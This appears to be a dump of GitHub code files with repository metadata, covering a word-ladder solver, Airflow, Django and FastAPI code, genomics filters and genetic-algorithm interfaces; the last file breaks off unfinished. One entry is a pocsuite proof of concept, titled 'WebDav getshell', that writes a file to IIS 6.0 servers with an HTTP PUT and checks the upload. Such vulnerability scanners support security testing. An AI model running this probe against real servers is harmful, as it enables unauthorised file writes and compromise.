max_stars_repo_path (stringlengths 4-182) | max_stars_repo_name (stringlengths 6-116) | max_stars_count (int64 0-191k) | id (stringlengths 7-7) | content (stringlengths 100-10k) | size (int64 100-10k) |
---|---|---|---|---|---|
anav.py | philippechataignon/anav | 0 | 2172197 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import string
import random
from itertools import chain
import networkx as nx
import pickle
import Levenshtein
letters = list(string.ascii_lowercase)
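# NB: mots_from() below uses a module-level dict `anag` (anagram key -> list of words),
# which is loaded in the __main__ block at the bottom of this file.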
def out(G):
for n in sorted(G) :
print(n, G.nodes[n])
def leven(word1,word2):
"""Calcul de la distance de Levenshtein entre 2 mots"""
#word1 = tri(word1)
#word2 = tri(word2)
return Levenshtein.distance(word1, word2)
def tri(s) :
""" Renvoit le mot trié pour repérage anagramme """
return "".join(sorted(list(s)))
def cree_anag(infile, outfile):
"""constitue dictionnaire des anagrammes depuis dico
Le dictionnaire renvoyé est de la forme :
* clé : "mot" constitué des lettres triés
* valeur : liste des mots anagrammes
Exemple : 'aimnos': ['aimons', 'amnios', 'maison']
"""
print('Début lecture')
with open(infile) as f:
anag = {}
for l in f:
l = l.strip()
tll = tri(l)
if tll not in anag:
anag[tll] = [l]
else:
anag[tll].append(l)
print('Reading done')
with open(outfile, "wb") as f:
pickle.dump(anag, f)
return anag
def lis_anag(infile):
print('Reading started')
with open(infile, 'rb') as f:
anag = pickle.load(f)
print('Reading done')
return anag
def mots_from(mot):
"""renvoie la liste des mots relié à mot"""
ch = tri(mot)
s = set()
for le in letters :
s.add(tri(ch + le)) # add a letter
for i, l in enumerate(ch) :
base = ch[:i] + ch[i+1:] # remove a letter
s.add(base) # remove a letter
for le in letters :
s.add(tri(base + le)) # substitute a letter
return chain(*(anag.get(ch, []) for ch in s))
def expand(G, curr, cible, atteint=True, explore=False):
"""Etend le graphe depuis curr
Le node curr passe à l'état explore à True
On récupère ses voisins et on les ajoute au graphe
à l'état explore à False
"""
dist_curr = leven(cible, curr)
G.add_node(curr, explore=True, dist=dist_curr, atteint=atteint)
for u in mots_from(curr):
if u not in G:
dist = leven(cible, u)
G.add_node(u, explore=explore, dist=dist, atteint=atteint)
else :
G.nodes[u]['atteint'] = atteint
G.add_edge(curr, u)
def analyse(G, fin, opti):
""" Analyse du graphe
Teste si on a une solution
Définit les noeuds à explorer
Lance leur exploration
"""
# Limite recherches
# On cherche le min des dist + opti
min_dist = None
if opti >= 0 :
min_dist = min([G.nodes[n]['dist'] for n in G if G.nodes[n]['atteint']])
# les nodes trop lointains sont considérés comme déjà explorés
for n in G:
if G.nodes[n]['dist'] > min_dist + opti :
G.nodes[n]['explore'] = True
# constition de la liste des nodes non explorés, donc à explorer
nodes = [n for n in G if not G.nodes[n]['explore']]
print('Analyse : ', len(nodes), 'nouveaux nodes à explorer - Distance mini :', min_dist)
for node in nodes :
expand(G, node, fin)
def cherche(G, debut, fin, max_loop=20, opti=-1):
""" Boucle principale
* explore le premier node (debut)
* puis lance l'analyse des différents niveaux (maximum max_loop)
* et vérifie si on a trouvé une solution
"""
# on génère un morceau de graphe par la fin
expand(G, fin, fin, atteint=False, explore=True)
nodes = list(G.nodes())
for n in nodes:
expand(G, n, fin, atteint=False, explore=True)
# generate the start of the graph
expand(G, debut, fin)
flag = False
# then progressively widen the analysis and the graph construction
for level in range(max_loop):
analyse(G, fin, opti)
# if a path exists, stop
if nx.has_path(G, debut, fin):
flag = True
break
# report the different paths
if flag :
print('100 random solutions:')
sol = list(nx.all_shortest_paths(G,source=debut,target=fin))
random.shuffle(sol)
for i, p in enumerate(sol):
if i < 100:
print(p)
print('Total number of solutions:', i+1)
else:
print("Pas de chemin trouvé")
if __name__ == '__main__':
#anag = cree_anag("lmots.txt", "lmots.pickle")
anag = lis_anag("lmots.pickle")
G = nx.Graph()
####cherche(G, 'toiture', 'abricot', opti=2)
## cherche(G, 'pipo', 'squelette', opti=2)
## cherche(G, 'stylo', 'zoulou', opti=2)
# cherche(G, 'ire', 'hydrotherapique', max_loop=30, opti=4)
cherche(G, 'vent', 'moulin', opti=2)
| 4,765 |
airflow/utils/configuration.py | mr-mcox/incubator-airflow | 0 | 2172652 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
from __future__ import absolute_import
import os
import json
from tempfile import mkstemp
from airflow import configuration as conf
COPY_SECTIONS = [
'core', 'smtp', 'scheduler', 'celery', 'webserver', 'hive'
]
def tmp_configuration_copy():
"""
Returns a path for a temporary file including a full copy of the configuration
settings.
:return: a path to a temporary file
"""
cfg_dict = conf.as_dict(display_sensitive=True)
temp_fd, cfg_path = mkstemp()
cfg_subset = dict()
for section in COPY_SECTIONS:
cfg_subset[section] = cfg_dict.get(section, {})
with os.fdopen(temp_fd, 'w') as temp_file:
json.dump(cfg_subset, temp_file)
return cfg_path
| 1,568 |
vul/15-WebDav-getshell.py | zx273983653/vulscan | 582 | 2172895 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
# command-line mode
from pocsuite import pocsuite_cli
# verification mode
from pocsuite import pocsuite_verify
# attack mode
from pocsuite import pocsuite_attack
# console mode
from pocsuite import pocsuite_console
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
class IiswebdavPOC(POCBase):
vulID = '15' # SSVID; use 0 if the PoC is submitted together with the vulnerability report
version = '1' # defaults to 1
vulDate = '2017-07-11' # date the vulnerability was disclosed; use today's date if unknown
author = 'w<EMAIL>@YSRC' # name of the PoC author
createDate = '2017-07-11'# date the PoC was written
updateDate = '2017-07-11'# date the PoC was last updated; defaults to the creation date
references = 'http://www.cnblogs.com/cnhacker/p/6999102.html'# source/reference for the vulnerability; leave empty for 0-days
name = 'iis webdav PUT getshell'# PoC name
appPowerLink = 'https://www.iis.net/'# vendor homepage
appName = 'iis'# affected application name
appVersion = 'iis 6.0'# affected versions
vulType = 'file-upload'# vulnerability type; see the vulnerability type reference table
desc = '''
IIS 6.0 WebDAV PUT file write vulnerability
''' # short description of the vulnerability
samples = []# sample sites successfully tested with this PoC
install_requires = [] # third-party module dependencies; avoid third-party modules where possible
cvss = u"严重" # severity: 严重 (critical), 高危 (high), 中危 (medium), 低危 (low)
# verify the vulnerability: pocsuite -r 15-WebDav-getshell.py -u 1.1.1.1 --verify
def _verify(self):
# result dict to return
result = {}
# target URL of the vulnerability
vul_url = '%s' % self.url
import socket
import time
import urllib2
try:
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# note: ip/port were undefined in the original; derive the host from the target URL and assume port 80
ip = vul_url.split('://')[-1].split('/')[0].split(':')[0]
port = 80
s.connect((ip, port))
flag = "PUT /vultest.txt HTTP/1.1\r\nHost: %s:80\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n" % vul_url
s.send(flag)
time.sleep(1)
data = s.recv(1024)
s.close()
if 'PUT' in data:
url = vul_url + '/vultest.txt'
request = urllib2.Request(url)
res_html = urllib2.urlopen(request, timeout=5).read(204800)  # 'timeout' was undefined in the original; use a 5s timeout
if 'xxscan0' in res_html:
print u"iis webdav漏洞"
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = flag
else:
#print u'\nNot vulnerable: ' + url
pass
except:
# return url
pass
print '[+]15 poc done'
return self.save_output(result)
# attack mode
def _attack(self):
result = {}
# attack code
return self._verify()
def save_output(self, result):
# output the result if any, otherwise report failure
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(IiswebdavPOC)
| 2,839 |
dash/categories/migrations/0006_auto_20141008_1955.py | unicefindia/dash | 0 | 2173044 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('categories', '0005_auto_20140922_1514'),
]
operations = [
migrations.AlterField(
model_name='category',
name='org',
field=models.ForeignKey(related_name='categories', to='orgs.Org', help_text='The organization this category applies to'),
),
]
| 487 |
predictor/diff-natural.py | bromjiri/Presto | 0 | 2172936 |
import settings
import pandas as pd
import numpy as np
import datetime
import os
class Stock:
def __init__(self, subject):
input_file = settings.PREDICTOR_STOCK + "/" + subject + ".csv"
self.stock_df = pd.read_csv(input_file, sep=',', index_col='Date')
def get_diff(self, from_date, to_date):
return self.stock_df['Diff'].loc[from_date:to_date]
class Sent:
def __init__(self, subject, source):
input_file = settings.PREDICTOR_SENTIMENT + "/" + source + "/" + source + "-sent-" + subject + ".csv"
self.sent_df = pd.read_csv(input_file, sep=',', index_col='Date')
def create_diff(self, precision, stock_dates):
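# Builds the Natural1..Natural3 columns: day-over-day sentiment differences shifted by
# 1..3 days and re-aligned to the stock trading dates, zeroed whenever the post count
# (Tot column) is below 10; a few fixed April 2017 dates are then patched in directly.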
sentiment_col = "Sent" + precision
total_col = "Tot" + precision
diff_df = pd.DataFrame(index=stock_dates, columns=['Natural1', 'Natural2', 'Natural3'])
diff_df.index.name = "Date"
for i in range(1,4):
col = "Natural" + str(i)
temp_df = pd.DataFrame(index=stock_dates, columns=['Natural'])
temp_df['Total'] = self.sent_df[total_col]
sunday_df = np.round(self.sent_df[sentiment_col].to_frame().diff(), 2)
april26 = sunday_df[sentiment_col].loc['2017-04-26']
april27 = sunday_df[sentiment_col].loc['2017-04-27']
april28 = sunday_df[sentiment_col].loc['2017-04-28']
# shift up
sunday_df[sentiment_col] = sunday_df[sentiment_col].shift(i)
# merge
temp_df['Natural'] = sunday_df[sentiment_col].loc[stock_dates]
# shift down
temp_df['Natural'] = temp_df['Natural'].shift(-i)
diff_df[col] = temp_df.apply(func, args=('Natural',), axis=1)
diff_df.set_value('2017-04-26', col, april26)
diff_df.set_value('2017-04-27', col, april27)
diff_df.set_value('2017-04-28', col, april28)
return diff_df
def func(row, col):
if row['Total'] >= 10:
return row[col]
else:
return 0
def run_one(subject, from_date, to_date, precision):
# stock dataframe
stock = Stock(subject)
stock_df = stock.get_diff(from_date, to_date)
# print(stock_df)
# sentiment dataframe
sent = Sent(subject, source)
diff_df = sent.create_diff(precision, stock_df.index.values)
# print(diff_df)
# combine
diff_df['Stock'] = stock_df
# print(diff_df)
# save output
output_file_path = settings.PREDICTOR_DIFF + '/' + source + '/' + subject + '/' + source + '-diff-' + subject + '-' + precision + '-nat.csv'
dir = os.path.dirname(os.path.realpath(output_file_path))
os.makedirs(dir, exist_ok=True)
diff_df.to_csv(output_file_path)
def run_the(subject, from_date, to_date, precision):
stock = Stock('djia')
stock_df = stock.get_diff(from_date, to_date)
# sentiment dataframe
sent = Sent(subject, source)
diff_df = sent.create_diff(precision, stock_df.index.values)
indexes = ['djia', 'nasdaq', 'snp']
for index in indexes:
# stock dataframe
stock = Stock(index)
stock_df = stock.get_diff(from_date, to_date)
# combine
diff_df[index] = stock_df
# save output
output_file_path = settings.PREDICTOR_DIFF + '/' + source + '/' + subject + '/' + source + '-diff-' + subject + '-' + precision + '-nat.csv'
dir = os.path.dirname(os.path.realpath(output_file_path))
os.makedirs(dir, exist_ok=True)
diff_df.to_csv(output_file_path)
from_date = '2016-11-01'
to_date = '2017-04-30'
source = "stwits"
subjects = ["djia", "nasdaq", "snp"]
# subjects = ["tesla"]
precisions = ["0.6", "0.8", "1.0"]
# precisions = ["0.6"]
for precision in precisions:
for subject in subjects:
print(subject, precision)
run_one(subject, from_date, to_date, precision)
# run_the('the', from_date, to_date, precision)
| 3,885 |
hamper/plugins/__init__.py | ecnahc515/hamper | 2 | 2173053 |
# This allows twisted.plugin to autodiscover plugins in this module.
# See: https://twistedmatrix.com/documents/12.2.0/core/howto/plugin.html
from twisted.plugin import pluginPackagePaths
__path__.extend(pluginPackagePaths(__name__))
__all__ = []
| 247 |
models/drawable.py | HumbleCatcher/A-Simplified-Simulation-of-Evolution | 0 | 2170104 |
from abc import ABC
from structs.color import Color
from structs.point import Point
class Drawable(ABC):
def __init__(self, position: Point, radius, color: Color):
self.position = position
self.last_position = position
self.last_drawn_position = position
self.radius = radius
self.color = color
self.canvas_id = None
| 386 |
project_ws/src/project_pkg/src/sheet_music/template_matching.py | MatthewTurney/SheetMusicRecognition | 0 | 2172671 |
import cv2 as cv
import imutils
import numpy as np
import MTM
def calc_boxes(template, threshold, img):
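# Run multi-template matching (MTM) with a single template and return the "BBox"
# column of all hits above `threshold`; an empty list is returned when nothing matches.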
try:
hits = MTM.matchTemplates([("staff", template)], img, method=cv.TM_CCOEFF_NORMED,
N_object=float("inf"), score_threshold=threshold, maxOverlap=0.2, searchBox=None)
return hits["BBox"]
except KeyError as ke:
print(str(ke))
return []
def remove_template_matches(img, template, threshold):
matches = []
for x, y, w, h in calc_boxes(template, threshold, img):
cv.rectangle(img, (x,y), (x+w, y+h), (0, 0, 0), cv.FILLED)
matches.append((x + (w//2), y + (h//2)))
return img, matches
def remove_template_matches_with_buffer(img, template, threshold, b):
matches = []
for x, y, w, h in calc_boxes(template, threshold, img):
cv.rectangle(img, (x+b,y), (x+w-b, y+h), (0, 0, 0), cv.FILLED)
matches.append((x + (w//2), y + (h//2)))
return img, matches
| 959 |
app/crud/article.py | schmiedeone/audit-app-backend | 0 | 2173106 |
from typing import List, Optional
from asyncpg import Connection
from slugify import slugify
from app.models.article import (
ArticleFilterParams,
ArticleInCreate,
ArticleInDB,
ArticleInUpdate,
)
from .profile import get_profile_for_user
from .tag import (
create_tags_that_not_exist,
get_tags_for_article,
link_tags_with_article,
)
async def is_article_favorited_by_user(
conn: Connection, slug: str, username: str
) -> bool:
return await conn.fetchval(
"""
SELECT CASE WHEN user_id IS NULL THEN FALSE ELSE TRUE END AS favorited
FROM favorites
WHERE
user_id = (SELECT id FROM users WHERE username = $1)
AND
article_id = (SELECT id FROM articles WHERE slug = $2)
""",
username,
slug,
)
async def add_article_to_favorites(conn: Connection, slug: str, username: str):
await conn.execute(
"""
INSERT INTO favorites (user_id, article_id)
VALUES (
(SELECT id FROM users WHERE username = $2),
(SELECT id FROM articles WHERE slug = $1)
)
""",
slug,
username,
)
async def remove_article_from_favorites(conn: Connection, slug: str, username: str):
await conn.execute(
"""
DELETE FROM favorites
WHERE
article_id = (SELECT id FROM articles WHERE slug = $1)
AND
user_id = (SELECT id FROM users WHERE username = $2)
""",
slug,
username,
)
async def get_favorites_count_for_article(conn: Connection, slug: str):
return await conn.fetchval(
"""
SELECT count(*) as favorites_count
FROM favorites
WHERE article_id = (SELECT id FROM articles WHERE slug = $1)
""",
slug,
)
async def get_article_by_slug(
conn: Connection, slug: str, username: Optional[str] = None
) -> ArticleInDB:
article_info_row = await conn.fetchrow(
"""
SELECT id, slug, title, description, body, created_at, updated_at,
(SELECT username FROM users WHERE id = author_id) AS author_username
FROM articles
WHERE slug = $1
""",
slug,
)
if article_info_row:
author = await get_profile_for_user(
conn, article_info_row["author_username"], username
)
tags = await get_tags_for_article(conn, slug)
favorites_count = await get_favorites_count_for_article(conn, slug)
favorited_by_user = await is_article_favorited_by_user(conn, slug, username)
return ArticleInDB(
**article_info_row,
author=author,
tag_list=[tag.tag for tag in tags],
favorited=favorited_by_user,
favorites_count=favorites_count,
)
async def create_article_by_slug(
conn: Connection, article: ArticleInCreate, username: str
) -> ArticleInDB:
slug = slugify(article.title)
row = await conn.fetchrow(
"""
INSERT INTO articles (slug, title, description, body, author_id)
VALUES ($1, $2, $3, $4, (SELECT id FROM users WHERE username = $5))
RETURNING
id,
slug,
title,
description,
body,
(SELECT username FROM users WHERE id = author_id) as author_username,
created_at,
updated_at
""",
slug,
article.title,
article.description,
article.body,
username,
)
author = await get_profile_for_user(conn, row["author_username"], "")
if article.tag_list:
await create_tags_that_not_exist(conn, article.tag_list)
await link_tags_with_article(conn, slug, article.tag_list)
return ArticleInDB(
**row,
author=author,
tag_list=article.tag_list,
favorites_count=1,
favorited=True,
)
async def update_article_by_slug(
conn: Connection, slug: str, article: ArticleInUpdate, username: str
) -> ArticleInDB:
dbarticle = await get_article_by_slug(conn, slug, username)
if article.title:
dbarticle.slug = slugify(article.title)
dbarticle.title = article.title
dbarticle.body = article.body if article.body else dbarticle.body
dbarticle.description = (
article.description if article.description else dbarticle.description
)
row = await conn.fetchrow(
"""
UPDATE articles
SET slug = $1, title = $2, body = $3, description = $4
WHERE slug = $5 AND author_id = (SELECT id FROM users WHERE username = $6)
RETURNING updated_at
""",
dbarticle.slug,
dbarticle.title,
dbarticle.body,
dbarticle.description,
slug,
username,
)
dbarticle.updated_at = row["updated_at"]
return dbarticle
async def delete_article_by_slug(conn: Connection, slug: str, username: str):
await conn.execute(
"""
DELETE FROM articles
WHERE slug = $1 AND author_id = (SELECT id FROM users WHERE username = $2)
""",
slug,
username,
)
async def get_user_articles(
conn: Connection, username: str, limit=20, offset=0
) -> List[ArticleInDB]:
articles: List[ArticleInDB] = []
rows = await conn.fetch(
"""
SELECT a.id, a.slug, a.title, a.description, a.body, a.created_at, a.updated_at,
(SELECT username FROM users WHERE id = author_id) AS author_username
FROM articles a
INNER JOIN favorites f on a.id = f.article_id AND user_id = (SELECT id FROM users WHERE username = $1)
ORDER BY a.created_at
LIMIT $2
OFFSET $3
""",
username,
limit,
offset,
)
for row in rows:
slug = row["slug"]
author = await get_profile_for_user(conn, row["author_username"], username)
tags = await get_tags_for_article(conn, slug)
favorites_count = await get_favorites_count_for_article(conn, slug)
favorited_by_user = await is_article_favorited_by_user(conn, slug, username)
articles.append(
ArticleInDB(
**row,
author=author,
tagList=[tag.tag for tag in tags],
favorites_count=favorites_count,
favorited=favorited_by_user,
)
)
return articles
async def get_articles_with_filters(
conn: Connection, filters: ArticleFilterParams, username: Optional[str] = None
) -> List[ArticleInDB]:
articles: List[ArticleInDB] = []
query_params_count = 0
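# The query is assembled dynamically: each active filter appends a JOIN that consumes
# the next positional parameter ($1, $2, ...), and LIMIT/OFFSET always take the last
# two positions, so the params list below must supply values in exactly that order.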
base_query = """
SELECT
a.id,
a.slug,
a.title,
a.description,
a.body,
a.created_at,
a.updated_at,
(SELECT username FROM users WHERE id = a.author_id) AS author_username
FROM articles a
"""
if filters.tag:
query_params_count += 1
base_query += f"""
INNER JOIN article_tags at ON
a.id = at.article_id
AND
at.tag_id = (SELECT id FROM tags WHERE tag = ${query_params_count})
"""
if filters.favorited:
query_params_count += 1
base_query += f"""
INNER JOIN favorites fav ON
a.id = fav.article_id
AND
fav.user_id = (SELECT id FROM users WHERE username = ${query_params_count})
"""
if filters.author:
query_params_count += 1
base_query += f"""
LEFT OUTER JOIN users u ON
a.author_id = u.id
AND
u.id = (SELECT id FROM users WHERE u.username = ${query_params_count})
"""
base_query += f"""
LIMIT ${query_params_count + 1}
OFFSET ${query_params_count + 2}
"""
params = [
param
for param in [
filters.tag or None,
filters.favorited or None,
filters.author or None,
filters.limit,
filters.offset,
]
if param is not None
]
rows = await conn.fetch(base_query, *params)
for row in rows:
slug = row["slug"]
author = await get_profile_for_user(conn, row["author_username"], username)
tags = await get_tags_for_article(conn, slug)
favorites_count = await get_favorites_count_for_article(conn, slug)
favorited_by_user = await is_article_favorited_by_user(conn, slug, username)
articles.append(
ArticleInDB(
**row,
author=author,
tag_list=[tag.tag for tag in tags],
favorites_count=favorites_count,
favorited=favorited_by_user,
)
)
return articles
| 8,845 |
Step04_Identify_new_targets/filterFinalRescue.py | talkowski-lab/SMC_CNN_Model | 1 | 2173063 |
#!/usr/bin/env python
from __future__ import division
import numpy.random as npr
import shlex, subprocess
import commands
def extract_info(a):
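# Parse a ClinVar INFO string: extract clinical significance (CLNSIG/CLNSIGINCL),
# molecular consequence (MC), allele id (ALLELEID), disease name (CLNDN/CLNDNINCL)
# and disease database ids (CLNDISDB/CLNDISDBINCL); returned as [patho, mc, al, ds, db].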
al=a.split("ALLELEID=")[1].split(";")[0]
if "CLNDN=" in a:
ds=a.split("CLNDN=")[1].split(";")[0]
else:
ds=a.split("CLNDNINCL=")[1].split(";")[0]
if "CLNDISDB=" in a:
db=a.split("CLNDISDB=")[1].split(";")[0]
else:
db=a.split("CLNDISDBINCL=")[1].split(";")[0]
if "CLNSIG=" in a:
patho=a.split("CLNSIG=")[1].split(";")[0]
else:
patho=a.split("CLNSIGINCL=")[1].split(";")[0]
if "MC=" in a:
mc=a.split("MC=")[1].split(";")[0]
else:
mc="NA"
return [patho,mc,al,ds,db]
def pub(var_citations):
liter={}
with open(var_citations,"r") as f:
d=f.readlines()
for x in d[1:]:
t=x.strip().split("\t")
pid=t[-1]
src=t[-2]
ids=t[1]
if src=="PubMed":
if (ids in liter)==False:
liter[ids]=[pid,1]
else:
liter[ids][0]+=","+pid
liter[ids][1]+=1
return liter
def cp(sad_inp):
pp={}
with open(sad_inp,"r") as ff:
dd=ff.readlines()
for rec in dd:
tt=rec.strip().split("\t")
if ((tt[2],tt[5]) in pp) == False:
pp[(tt[2],tt[5])]=[tt[-3],tt[-2],tt[-1]]
else:
print "Error: Record duplication"
return pp
def incl_filter(a,piece,c0,c1,c2):
outSAD=a[:-4]+"_inclusion.txt"
dicM=pub("../Input_data/var_citations_20190325.txt")
dicP=cp("../Output_data/clinvar_20190325_SNV_INDEL1000_mainChr_headerLength_spliceAIpredicted_ds02_pathogenic_junctions_mEX_4BassetSad.vcf")
with open(a,"r") as f:
d=f.readlines()
f2=open(outSAD,"w")
f2.write(d[0].strip()+"\tPathogenic\tMC\tAlleleID\tDisease\tDisease_DB\tNum_paper\tPubMedID\n")
i=1
while i<len(d):
hit=0
cid,tid,dis,ref,mut,target0,pred_ref0,pred_mut0,chg0=d[i].strip().split("\t")
cid,tid,dis,ref,mut,target1,pred_ref1,pred_mut1,chg1=d[i+1].strip().split("\t")
cid,tid,dis,ref,mut,target2,pred_ref2,pred_mut2,chg2=d[i+2].strip().split("\t")
if (float(pred_mut0)>=c0 and float(pred_mut0)>float(pred_mut1) and float(pred_mut0)>float(pred_mut2)):
hit+=1
if "seqDiff" in dis:
hit+=1
if ("mEXdrop3" in dis) and ("nonsense" in dis)==False and ("frameshift" in dis)==False and ("junctGone" in dis)==False:
hit+=1
if cid in dicM:
hit+=1
if hit ==4:
info=extract_info(dicP[(cid,tid)][0])
f2.write(d[i].strip()+"\t"+"\t".join(info)+"\t"+dicM[cid][0]+"\t"+str(dicM[cid][1])+"\n")
i+=3
f2.close()
return 1
def excl_filter(a,piece,c0,c1,c2):
outSAD=a[:-4]+"_exclusion.txt"
dicM=pub("../Input_data/var_citations_20190325.txt")
dicP=cp("../Output_data/clinvar_20190325_SNV_INDEL1000_mainChr_headerLength_spliceAIpredicted_ds02_pathogenic_junctions_mEX_4BassetSad.vcf")
with open(a,"r") as f:
d=f.readlines()
f2=open(outSAD,"w")
f2.write(d[0].strip()+"\tPathogenic\tMC\tAlleleID\tDisease\tDisease_DB\tNum_paper\tPubMedID\n")
i=1
while i<len(d):
hit=0
cid,tid,dis,ref,mut,target0,pred_ref0,pred_mut0,chg0=d[i].strip().split("\t")
cid,tid,dis,ref,mut,target1,pred_ref1,pred_mut1,chg1=d[i+1].strip().split("\t")
cid,tid,dis,ref,mut,target2,pred_ref2,pred_mut2,chg2=d[i+2].strip().split("\t")
seq0=dicP[(cid,tid)][-2]
seq1=dicP[(cid,tid)][-1]
start =int(tid.split("@")[2].split("^")[1].split("&")[0])
end =int(tid.split("@")[2].split("&")[1].split("^")[0])-1
if (float(pred_mut0)<float(pred_mut1) and float(pred_mut1)>=c1 and float(pred_mut2)<float(pred_mut1)):
hit+=1
if "seqDiff" in dis:
hit+=1
if (("mEXmore" in dis) and ("nonsense" in dis)==False and ("frameshift" in dis)==False and ("junctGone" in dis)==False) or (((end-start)%3)==0 and ("nonsense_mEX" in dis)):
hit+=1
if cid in dicM:
hit+=1
if hit ==4:
info=extract_info(dicP[(cid,tid)][0])
f2.write(d[i+1].strip()+"\t"+"\t".join(info)+"\t"+dicM[cid][0]+"\t"+str(dicM[cid][1])+"\n")
i+=3
f2.close()
return 1
def doit(inp,region,cut0,cut1,cut2):
incl_filter(inp,region,cut0,cut1,cut2)
excl_filter(inp,region,cut0,cut1,cut2)
return 1
doit("../Output_data/sad_table.txt",
4,
0.225832171738145,
0.803149670362475,
0.36993284523487)
| 4,717 |
src/ga/interfaces/island.py | technote-space/genetic-algorithms-py | 3 | 2171999 |
from abc import ABCMeta, abstractmethod
from .population import IPopulation
from .fitness import IFitness
from .selection import ISelection
from .crossover import ICrossover
from .mutation import IMutation
from .reinsertion import IReinsertion
class IIsland(metaclass=ABCMeta):
"""
Description:
------------
Interface for an island in the island model.
"""
__population: IPopulation
__fitness: IFitness
__selection: ISelection
__crossover: ICrossover
__mutation: IMutation
__reinsertion: IReinsertion
__evaluate_parents_fitness: bool
def __init__(
self,
population: IPopulation,
fitness: IFitness,
selection: ISelection,
crossover: ICrossover,
mutation: IMutation,
reinsertion: IReinsertion,
evaluate_parents_fitness: bool
):
self.__population = population
self.__fitness = fitness
self.__selection = selection
self.__crossover = crossover
self.__mutation = mutation
self.__reinsertion = reinsertion
self.__evaluate_parents_fitness = evaluate_parents_fitness
@property
def population(self) -> IPopulation:
return self.__population
@property
def fitness(self) -> IFitness:
return self.__fitness
@property
def selection(self) -> ISelection:
return self.__selection
@property
def crossover(self) -> ICrossover:
return self.__crossover
@property
def mutation(self) -> IMutation:
return self.__mutation
@property
def reinsertion(self) -> IReinsertion:
return self.__reinsertion
@property
def evaluate_parents_fitness(self) -> bool:
return self.__evaluate_parents_fitness
@property
@abstractmethod
def initialized(self) -> bool:
pass
@property
@abstractmethod
def generation_number(self) -> int:
pass
@property
@abstractmethod
def offspring_number(self) -> int:
pass
@abstractmethod
def reset(self) -> None:
pass
@abstractmethod
def step(self) -> None:
pass
| 2,123 |
src/posprocessing/bias.py | DiegoCorrea/masters-dissertation | 0 | 2170644 |
from copy import deepcopy
import pandas as pd
from src.config.labels import ITEM_LABEL, TRANSACTION_VALUE_LABEL, BIAS_VALUE_LABEL
from src.config.variables import BIAS_SIGMA, BIAS_ALPHA
def calculating_item_bias(trainset_df, transaction_mean):
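# Damped item bias: b_i = sum_u (r_ui - mu) / (BIAS_ALPHA + |R_i|),
# i.e. the regularized average deviation of item i's transactions from the global mean mu.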
in_bias_trainset_df = deepcopy(trainset_df)
items_ids = in_bias_trainset_df[ITEM_LABEL].unique().tolist()
in_bias_trainset_df[TRANSACTION_VALUE_LABEL] -= transaction_mean
item_bias_df = pd.DataFrame()
for item in items_ids:
item_subset_df = in_bias_trainset_df[in_bias_trainset_df[ITEM_LABEL] == item]
up = item_subset_df[TRANSACTION_VALUE_LABEL].sum()
down = BIAS_ALPHA + len(item_subset_df)
item_bias_df = pd.concat(
[item_bias_df, pd.DataFrame(data=[[item, up / down]], columns=[ITEM_LABEL, BIAS_VALUE_LABEL])])
return item_bias_df
def calculating_user_bias(users_items, transaction_mean, bias_list, i_id):
up = users_items[i_id].score - transaction_mean - users_items[i_id].bias
bias_list.append(up)
return sum(bias_list) / (BIAS_SIGMA + len(bias_list)), bias_list
| 1,099 |
app/db.py | veelupu/AI-chatbot | 0 | 2171991 |
# Copyright (c) 2021 <NAME>
from . import app
from flask_sqlalchemy import SQLAlchemy
from os import getenv
app.config["SQLALCHEMY_DATABASE_URI"] = getenv("DATABASE_URL")
db = SQLAlchemy(app)
def keywords():
sql = "SELECT word FROM aicb.question"
result = db.session.execute(sql)
keywords = result.fetchall()
db.session.commit()
keyword_set = set([
x.word
for x in keywords])
return keyword_set
def fetch_id(word):
sql = "SELECT id FROM aicb.question WHERE word=(:word)"
result = db.session.execute(sql, {"word":word})
id = result.fetchone()[0]
db.session.commit()
return id
def fetch_answers(id):
sql = """SELECT content
FROM aicb.answer a
JOIN aicb.question_answer q_a
ON q_a.a_id = a.id
WHERE q_id=(:id)"""
result = db.session.execute(sql, {"id":id})
answers = result.fetchall()
db.session.commit()
answer_list = [
x.content
for x in answers
]
return answer_list
def check_code(code):
"Returns 0 if code does not exist, 1 if code is a human code and 2 otherwise."
sql = """SELECT human
FROM aicb.code c
WHERE c.id=(:code)"""
result = db.session.execute(sql, {"code":code})
answer = result.fetchone()
db.session.commit()
if answer is None:
return 0
elif answer[0]:
return 1
else:
return 2
| 1,498 |
Sorting_nLogn_Methods/MedianOfTwoSortedArrays.py | dr-aheydari/Coding_Practice | 0 | 2172558 |
"""
Given two sorted arrays nums1 and nums2 of size m and n respectively, return the median of the two sorted arrays.
Follow up: The overall run time complexity should be O(log (m+n)).
Example 1:
Input: nums1 = [1,3], nums2 = [2]
Output: 2.00000
Explanation: merged array = [1,2,3] and median is 2.
Example 2:
Input: nums1 = [1,2], nums2 = [3,4]
Output: 2.50000
Explanation: merged array = [1,2,3,4] and median is (2 + 3) / 2 = 2.5.
Example 3:
Input: nums1 = [0,0], nums2 = [0,0]
Output: 0.00000
Example 4:
Input: nums1 = [], nums2 = [1]
Output: 1.00000
Example 5:
Input: nums1 = [2], nums2 = []
Output: 2.00000
Constraints:
nums1.length == m
nums2.length == n
0 <= m <= 1000
0 <= n <= 1000
1 <= m + n <= 2000
-10^6 <= nums1[i], nums2[i] <= 10^6
"""
class Solution(object):
## using built in python's sort function :)
